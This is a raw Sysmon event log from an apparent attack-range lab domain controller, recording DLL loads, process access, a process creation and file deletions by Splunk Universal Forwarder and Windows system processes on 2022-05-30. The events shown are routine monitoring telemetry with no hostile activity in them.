13:06:49.031{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100664Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
734700x8000000000000000100797Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000100796Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000100795Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x8000000000000000100794Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x8000000000000000100793Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x8000000000000000100792Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x8000000000000000100791Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft 
Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000100790Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000100789Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000100788Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x8000000000000000100787Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program 
Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000100786Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x8000000000000000100785Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000100784Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000100783Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000100782Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000100781Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x8000000000000000100780Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating 
SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 734700x8000000000000000100779Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x8000000000000000100778Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 10341000x8000000000000000100777Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100776Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000100775Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x8000000000000000100774Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100773Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk 
Inc.splunk-regmon.exeMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778trueSplunk, Inc.Valid 10341000x8000000000000000100772Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100771Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:51.202{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100770Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100769Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:51.202{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100768Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-A252-6294-0500-000000005502}4161908C:\Windows\system32\csrss.exe{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000100767Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000100766Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.203{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000100872Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:52.515{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93AA853E89B9EF816A18D4E125C82E03,SHA256=662F61CD9753F0B8612E9970D409F3086AF6DC2F6D71328F45014DD816954046,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100871Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:52.515{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77222C670D606DC0A36AC3EE89FB1999,SHA256=E49B3385945E5BFDA0B0B4FBABEAC27DA11B7960CD782FA51A2B18391F97886C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100870Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:52.156{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x8000000000000000100869Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:52.156{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating 
SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000100868Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:52.156{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x8000000000000000100867Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.999{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000100866Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.999{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft 